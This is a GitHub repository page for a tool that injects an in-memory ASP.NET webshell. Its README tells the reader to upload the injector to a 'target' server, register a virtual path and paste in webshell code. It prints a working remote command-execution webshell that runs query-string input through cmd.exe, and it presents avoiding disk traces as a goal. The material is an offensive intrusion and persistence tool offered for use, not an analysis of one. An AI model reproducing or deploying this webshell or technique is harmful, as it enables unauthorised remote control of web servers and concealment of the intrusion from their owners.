Skip to content

3h1xy/Custom-.NET-Memory-Webshell-Injection-Tool

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

3 Commits
.gitattributes
.gitattributes
 
 
LICENSE
LICENSE
 
 
README.md
README.md
 
 
custom_webshell_inject.aspx
custom_webshell_inject.aspx
 
 

Repository files navigation

Custom Memory Webshell Injection Tool

Usage Instructions

  1. Upload custom_webshell_inject.aspx to the target ASP.NET server
  2. Access the file
  3. Enter the desired virtual path in the "Webshell Path" input box, e.g.: /admin/shell.aspx
  4. Paste your webshell code in the "ASPX Webshell Content" input box
  5. Click the "Inject Webshell" button
  6. If injection succeeds, the access path will be displayed

Example Usage

Path Input:

/fakepath/webshell.aspx

Content Input:

<%@ Page Language="C#" %>
<% Response.Write("Hello from memory shell!"); %>

Or use a more complex webshell:

<%@ Page Language="C#" %>
<%
    if (Request.QueryString["cmd"] != null) {
        System.Diagnostics.Process.Start("cmd.exe", "/c " + Request.QueryString["cmd"]);
    }
%>

Technical Principle

This tool is based on ysoserial.net's GhostWebShell technology, using VirtualPathProvider to create virtual files in memory, avoiding leaving traces on disk.

Important Notes

  • Target server must support ASP.NET
  • Requires appropriate permissions to register VirtualPathProvider
  • Memory webshell will disappear after application restart

About

Custom Memory Webshell Injection Tool

Resources

Readme

License

MIT license
Activity

Stars

1 star

Watchers

0 watching

Forks

0 forks
Report repository

Releases

No releases published

Packages

 
 
 

Contributors

Languages